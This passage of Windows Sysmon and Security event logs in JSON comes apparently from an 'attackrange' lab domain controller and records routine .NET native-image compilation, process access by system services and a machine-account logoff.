{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7050,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:51.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E7-5F25-0000-001084370A00}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:51.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E7-5F25-0000-001084370A00}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7051,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:51.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:51.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220699,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA054B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa054b","LogonType":"3","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7052,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:51.962\r\nProcessGuid: {E2A3D6B1-12E7-5F25-0000-001084370A00}\r\nProcessId: 4112\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1010-0\\System.DirectoryServices.dll\r\nCreationUtcTime: 2020-08-01 06:59:51.962","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:51.962","ProcessGuid":"{E2A3D6B1-12E7-5F25-0000-001084370A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1010-0\\System.DirectoryServices.dll","CreationUtcTime":"2020-08-01 06:59:51.962","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7053,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:52.009\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E8-5F25-0000-0010A73B0A00}\r\nTargetProcessId: 2748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:52.009","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E8-5F25-0000-0010A73B0A00}","TargetProcessId":"2748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7054,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:52.009\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E8-5F25-0000-0010A73B0A00}\r\nTargetProcessId: 2748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:52.009","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E8-5F25-0000-0010A73B0A00}","TargetProcessId":"2748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7055,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:52.024\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E8-5F25-0000-0010A73B0A00}\r\nTargetProcessId: 2748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:52.024","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E8-5F25-0000-0010A73B0A00}","TargetProcessId":"2748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7056,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:52.071\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E8-5F25-0000-0010F23E0A00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:52.071","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E8-5F25-0000-0010F23E0A00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7057,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:52.071\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E8-5F25-0000-0010F23E0A00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:52.071","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E8-5F25-0000-0010F23E0A00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7058,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:52.071\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 